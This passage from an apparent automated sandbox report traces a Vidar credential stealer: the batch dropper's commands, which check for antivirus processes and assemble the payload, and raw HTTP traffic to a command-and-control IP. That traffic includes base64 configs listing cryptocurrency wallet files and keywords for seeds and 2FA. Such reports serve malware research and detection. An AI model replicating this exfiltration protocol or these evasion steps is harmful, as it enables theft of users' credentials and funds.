                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                Host: 5.75.212.60
                                                                                Content-Length: 331
                                                                                Connection: Keep-Alive
                                                                                Cache-Control: no-cache
                                                                                2024-07-26 15:54:56 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 44 41 41 41 46 42 4b 45 43 41 4b 45 48 49 45 42 41 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 39 36 64 63 35 37 62 31 37 64 36 31 34 31 31 62 37 62 66 34 63 63 64 37 32 31 35 37 61 37 39 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 41 46 42 4b 45 43 41 4b 45 48 49 45 42 41 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 61 37 32 65 62 30 36 39 33 39 65 61 34 37 38 37 35 33 64 35 63 34 64 66 34 62 32 62 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 41 46 42 4b 45 43 41 4b 45 48 49 45 42 41 46 49 45 0d 0a 43 6f 6e 74
                                                                                Data Ascii: ------DAAAFBKECAKEHIEBAFIEContent-Disposition: form-data; name="token"496dc57b17d61411b7bf4ccd72157a79------DAAAFBKECAKEHIEBAFIEContent-Disposition: form-data; name="build_id"1a72eb06939ea478753d5c4df4b2bd32------DAAAFBKECAKEHIEBAFIECont
                                                                                2024-07-26 15:54:57 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Fri, 26 Jul 2024 15:54:57 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                2024-07-26 15:54:57 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                                Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                19 | 192.168.2.6 | 64186 | 5.75.212.60 | 443 | 5740 | C:\Users\user\AppData\Local\Temp\229536\Webster.pif
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-07-26 15:54:58 UTC | 322 | OUT | POST / HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----AKEGDAKEHJDHIDHJJDAE
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                Host: 5.75.212.60
                                                                                Content-Length: 331
                                                                                Connection: Keep-Alive
                                                                                Cache-Control: no-cache
                                                                                2024-07-26 15:54:58 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 39 36 64 63 35 37 62 31 37 64 36 31 34 31 31 62 37 62 66 34 63 63 64 37 32 31 35 37 61 37 39 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 61 37 32 65 62 30 36 39 33 39 65 61 34 37 38 37 35 33 64 35 63 34 64 66 34 62 32 62 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 0d 0a 43 6f 6e 74
                                                                                Data Ascii: ------AKEGDAKEHJDHIDHJJDAEContent-Disposition: form-data; name="token"496dc57b17d61411b7bf4ccd72157a79------AKEGDAKEHJDHIDHJJDAEContent-Disposition: form-data; name="build_id"1a72eb06939ea478753d5c4df4b2bd32------AKEGDAKEHJDHIDHJJDAECont
                                                                                2024-07-26 15:54:58 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Fri, 26 Jul 2024 15:54:58 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                2024-07-26 15:54:58 UTC1524INData Raw: 35 65 38 0d 0a 52 6d 78 68 63 32 68 38 4a 55 52 53 53 56 5a 46 58 31 4a 46 54 55 39 57 51 55 4a 4d 52 53 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69
                                                                                Data Ascii: 5e8Rmxhc2h8JURSSVZFX1JFTU9WQUJMRSVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKi


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                20 | 192.168.2.6 | 64187 | 5.75.212.60 | 443 | 5740 | C:\Users\user\AppData\Local\Temp\229536\Webster.pif
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-07-26 15:54:59 UTC | 322 | OUT | POST / HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----EGIIJDHCGCBKECBFIJKK
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                Host: 5.75.212.60
                                                                                Content-Length: 465
                                                                                Connection: Keep-Alive
                                                                                Cache-Control: no-cache
                                                                                2024-07-26 15:54:59 UTC465OUTData Raw: 2d 2d 2d 2d 2d 2d 45 47 49 49 4a 44 48 43 47 43 42 4b 45 43 42 46 49 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 39 36 64 63 35 37 62 31 37 64 36 31 34 31 31 62 37 62 66 34 63 63 64 37 32 31 35 37 61 37 39 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 49 4a 44 48 43 47 43 42 4b 45 43 42 46 49 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 61 37 32 65 62 30 36 39 33 39 65 61 34 37 38 37 35 33 64 35 63 34 64 66 34 62 32 62 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 49 4a 44 48 43 47 43 42 4b 45 43 42 46 49 4a 4b 4b 0d 0a 43 6f 6e 74
                                                                                Data Ascii: ------EGIIJDHCGCBKECBFIJKKContent-Disposition: form-data; name="token"496dc57b17d61411b7bf4ccd72157a79------EGIIJDHCGCBKECBFIJKKContent-Disposition: form-data; name="build_id"1a72eb06939ea478753d5c4df4b2bd32------EGIIJDHCGCBKECBFIJKKCont
                                                                                2024-07-26 15:55:00 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Fri, 26 Jul 2024 15:54:59 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                2024-07-26 15:55:00 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 2ok0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                21 | 192.168.2.6 | 64188 | 5.75.212.60 | 443 | 5740 | C:\Users\user\AppData\Local\Temp\229536\Webster.pif
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-07-26 15:55:01 UTC | 325 | OUT | POST / HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----IDHIIJJJKEGIDGCBAFIJ
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                Host: 5.75.212.60
                                                                                Content-Length: 131049
                                                                                Connection: Keep-Alive
                                                                                Cache-Control: no-cache
                                                                                2024-07-26 15:55:01 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 49 44 48 49 49 4a 4a 4a 4b 45 47 49 44 47 43 42 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 39 36 64 63 35 37 62 31 37 64 36 31 34 31 31 62 37 62 66 34 63 63 64 37 32 31 35 37 61 37 39 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 49 4a 4a 4a 4b 45 47 49 44 47 43 42 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 61 37 32 65 62 30 36 39 33 39 65 61 34 37 38 37 35 33 64 35 63 34 64 66 34 62 32 62 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 49 4a 4a 4a 4b 45 47 49 44 47 43 42 41 46 49 4a 0d 0a 43 6f 6e 74
                                                                                Data Ascii: ------IDHIIJJJKEGIDGCBAFIJContent-Disposition: form-data; name="token"496dc57b17d61411b7bf4ccd72157a79------IDHIIJJJKEGIDGCBAFIJContent-Disposition: form-data; name="build_id"1a72eb06939ea478753d5c4df4b2bd32------IDHIIJJJKEGIDGCBAFIJCont
                                                                                2024-07-26 15:55:02 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Fri, 26 Jul 2024 15:55:02 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                2024-07-26 15:55:02 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 2ok0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                22 | 192.168.2.6 | 64189 | 5.75.212.60 | 443 | 5740 | C:\Users\user\AppData\Local\Temp\229536\Webster.pif
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-07-26 15:55:03 UTC | 322 | OUT | POST / HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----KEHDHIDAEHCFHJJJJECA
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                Host: 5.75.212.60
                                                                                Content-Length: 331
                                                                                Connection: Keep-Alive
                                                                                Cache-Control: no-cache
                                                                                2024-07-26 15:55:03 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 39 36 64 63 35 37 62 31 37 64 36 31 34 31 31 62 37 62 66 34 63 63 64 37 32 31 35 37 61 37 39 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 61 37 32 65 62 30 36 39 33 39 65 61 34 37 38 37 35 33 64 35 63 34 64 66 34 62 32 62 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 0d 0a 43 6f 6e 74
                                                                                Data Ascii: ------KEHDHIDAEHCFHJJJJECAContent-Disposition: form-data; name="token"496dc57b17d61411b7bf4ccd72157a79------KEHDHIDAEHCFHJJJJECAContent-Disposition: form-data; name="build_id"1a72eb06939ea478753d5c4df4b2bd32------KEHDHIDAEHCFHJJJJECACont
                                                                                2024-07-26 15:55:04 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Fri, 26 Jul 2024 15:55:04 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                2024-07-26 15:55:04 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Target ID:0
                                                                                Start time:11:52:59
                                                                                Start date:26/07/2024
                                                                                Path:C:\Users\user\Desktop\file.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                Imagebase:0x400000
                                                                                File size:834'674 bytes
                                                                                MD5 hash:1B0FE9739EF19752CB12647B6A4BA97B
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                Target ID:2
                                                                                Start time:11:53:02
                                                                                Start date:26/07/2024
                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\System32\cmd.exe" /k copy Fail Fail.cmd & Fail.cmd & exit
                                                                                Imagebase:0x1c0000
                                                                                File size:236'544 bytes
                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:3
                                                                                Start time:11:53:02
                                                                                Start date:26/07/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff66e660000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:4
                                                                                Start time:11:53:03
                                                                                Start date:26/07/2024
                                                                                Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:tasklist
                                                                                Imagebase:0xbd0000
                                                                                File size:79'360 bytes
                                                                                MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:moderate
                                                                                Has exited:true

                                                                                Target ID:5
                                                                                Start time:11:53:03
                                                                                Start date:26/07/2024
                                                                                Path:C:\Windows\SysWOW64\findstr.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:findstr /I "wrsa.exe opssvc.exe"
                                                                                Imagebase:0x110000
                                                                                File size:29'696 bytes
                                                                                MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:moderate
                                                                                Has exited:true

                                                                                Target ID:6
                                                                                Start time:11:53:03
                                                                                Start date:26/07/2024
                                                                                Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:tasklist
                                                                                Imagebase:0xbd0000
                                                                                File size:79'360 bytes
                                                                                MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:moderate
                                                                                Has exited:true

                                                                                Target ID:7
                                                                                Start time:11:53:03
                                                                                Start date:26/07/2024
                                                                                Path:C:\Windows\SysWOW64\findstr.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"
                                                                                Imagebase:0x110000
                                                                                File size:29'696 bytes
                                                                                MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:moderate
                                                                                Has exited:true

                                                                                Target ID:8
                                                                                Start time:11:53:04
                                                                                Start date:26/07/2024
                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:cmd /c md 229536
                                                                                Imagebase:0x1c0000
                                                                                File size:236'544 bytes
                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:9
                                                                                Start time:11:53:04
                                                                                Start date:26/07/2024
                                                                                Path:C:\Windows\SysWOW64\findstr.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:findstr /V "ReprintVerificationMercyRepository" Elliott
                                                                                Imagebase:0x110000
                                                                                File size:29'696 bytes
                                                                                MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:moderate
                                                                                Has exited:true

                                                                                Target ID:10
                                                                                Start time:11:53:04
                                                                                Start date:26/07/2024
                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:cmd /c copy /b Exhibit + Rand + Hours 229536\U
                                                                                Imagebase:0x1c0000
                                                                                File size:236'544 bytes
                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:11
                                                                                Start time:11:53:04
                                                                                Start date:26/07/2024
                                                                                Path:C:\Users\user\AppData\Local\Temp\229536\Webster.pif
                                                                                Wow64 process (32bit):true
                                                                                Commandline:229536\Webster.pif 229536\U
                                                                                Imagebase:0xa80000
                                                                                File size:893'608 bytes
                                                                                MD5 hash:6EE7DDEBFF0A2B78C7AC30F6E00D1D11
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000003.2876365347.00000000047F3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000003.2876471328.00000000018B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000003.2876421018.0000000001938000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000002.3322120004.0000000001B1E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000002.3322725102.00000000047F1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000002.3322120004.0000000001B4B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000002.3321760579.0000000001795000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.3322725102.000000000495E000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000003.2876514280.0000000001B4C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000002.3321827446.0000000001854000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                Antivirus matches:
                                                                                • Detection: 7%, ReversingLabs
                                                                                Reputation:moderate
                                                                                Has exited:false

                                                                                Target ID:12
                                                                                Start time:11:53:04
                                                                                Start date:26/07/2024
                                                                                Path:C:\Windows\SysWOW64\timeout.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:timeout 5
                                                                                Imagebase:0xfe0000
                                                                                File size:25'088 bytes
                                                                                MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true


                                                                                  Execution Graph

                                                                                  Execution Coverage:13.1%
                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                  Signature Coverage:20.6%
                                                                                  Total number of Nodes:1523
                                                                                  Total number of Limit Nodes:39
3510 403b2b 3506->3510 3511 4062fc 3 API calls 3507->3511 3682 406009 lstrcpynW 3509->3682 3681 406009 lstrcpynW 3510->3681 3515 403bef 3511->3515 3514 403b44 3683 406009 lstrcpynW 3514->3683 3518 403c3d ExitWindowsEx 3515->3518 3523 403bfd GetCurrentProcess 3515->3523 3518->3495 3520 403c4a 3518->3520 3519 403aa6 3667 406009 lstrcpynW 3519->3667 3711 40141d 3520->3711 3526 403c0d 3523->3526 3526->3518 3527 403b79 CopyFileW 3529 403b53 3527->3529 3528 403bc2 3530 406c68 42 API calls 3528->3530 3529->3528 3533 406805 18 API calls 3529->3533 3535 403bad CloseHandle 3529->3535 3684 406805 3529->3684 3703 406c68 3529->3703 3708 405c3f CreateProcessW 3529->3708 3532 403bc9 3530->3532 3532->3483 3533->3529 3535->3529 3537 406314 LoadLibraryA 3536->3537 3538 40631f GetProcAddress 3536->3538 3537->3538 3539 4038c6 SHGetFileInfoW 3537->3539 3538->3539 3540 406009 lstrcpynW 3539->3540 3540->3466 3541->3468 3543 405d0c 3542->3543 3544 40392a CharNextW 3543->3544 3545 405d13 CharNextW 3543->3545 3544->3485 3545->3543 3714 406038 3546->3714 3548 4037e2 3548->3475 3549 4037d8 3549->3548 3723 406722 lstrlenW CharPrevW 3549->3723 3730 405e50 GetFileAttributesW CreateFileW 3554->3730 3556 4035c7 3577 4035d7 3556->3577 3731 406009 lstrcpynW 3556->3731 3558 4035ed 3732 406751 lstrlenW 3558->3732 3562 4035fe GetFileSize 3563 4036fa 3562->3563 3576 403615 3562->3576 3739 4032d2 3563->3739 3565 403703 3567 40373f GlobalAlloc 3565->3567 3565->3577 3773 403368 SetFilePointer 3565->3773 3750 403368 SetFilePointer 3567->3750 3569 4037bd 3573 4032d2 6 API calls 3569->3573 3571 40375a 3751 40337f 3571->3751 3572 403720 3575 403336 ReadFile 3572->3575 3573->3577 3578 40372b 3575->3578 3576->3563 3576->3569 3576->3577 3579 4032d2 6 API calls 3576->3579 3737 403336 ReadFile 3576->3737 3577->3482 3578->3567 3578->3577 3579->3576 3580 403766 3580->3577 3580->3580 3581 403794 SetFilePointer 3580->3581 3581->3577 3583 4062fc 3 API calls 3582->3583 3584 405940 3583->3584 3585 405946 3584->3585 3586 
405958 3584->3586 3806 405f51 wsprintfW 3585->3806 3807 405ed3 RegOpenKeyExW 3586->3807 3590 4059a8 lstrcatW 3592 405956 3590->3592 3591 405ed3 3 API calls 3591->3590 3797 403e95 3592->3797 3595 40677e 18 API calls 3596 4059da 3595->3596 3597 405a70 3596->3597 3599 405ed3 3 API calls 3596->3599 3598 40677e 18 API calls 3597->3598 3600 405a76 3598->3600 3601 405a0c 3599->3601 3602 405a86 3600->3602 3603 406805 18 API calls 3600->3603 3601->3597 3607 405a2f lstrlenW 3601->3607 3613 405d06 CharNextW 3601->3613 3604 405aa6 LoadImageW 3602->3604 3813 403e74 3602->3813 3603->3602 3605 405ad1 RegisterClassW 3604->3605 3606 405b66 3604->3606 3611 405b19 SystemParametersInfoW CreateWindowExW 3605->3611 3614 403ac1 3605->3614 3612 40141d 80 API calls 3606->3612 3608 405a63 3607->3608 3609 405a3d lstrcmpiW 3607->3609 3617 406722 3 API calls 3608->3617 3609->3608 3615 405a4d GetFileAttributesW 3609->3615 3611->3606 3618 405b6c 3612->3618 3619 405a2a 3613->3619 3668 4060e7 3614->3668 3620 405a59 3615->3620 3616 405a9c 3616->3604 3621 405a69 3617->3621 3618->3614 3624 403e95 19 API calls 3618->3624 3619->3607 3620->3608 3622 406751 2 API calls 3620->3622 3812 406009 lstrcpynW 3621->3812 3622->3608 3625 405b7d 3624->3625 3626 405b89 ShowWindow LoadLibraryW 3625->3626 3627 405c0c 3625->3627 3629 405ba8 LoadLibraryW 3626->3629 3630 405baf GetClassInfoW 3626->3630 3818 405047 OleInitialize 3627->3818 3629->3630 3631 405bc3 GetClassInfoW RegisterClassW 3630->3631 3632 405bd9 DialogBoxParamW 3630->3632 3631->3632 3634 40141d 80 API calls 3632->3634 3633 405c12 3635 405c16 3633->3635 3636 405c2e 3633->3636 3637 405c01 3634->3637 3635->3614 3639 40141d 80 API calls 3635->3639 3638 40141d 80 API calls 3636->3638 3637->3614 3638->3614 3639->3614 3641 403871 3640->3641 3642 403863 CloseHandle 3640->3642 3966 403c83 3641->3966 3642->3641 3648 405cb5 3647->3648 3649 403aef ExitProcess 3648->3649 3650 405ccb MessageBoxIndirectW 3648->3650 3650->3649 3651->3473 4023 406009 lstrcpynW 3652->4023 
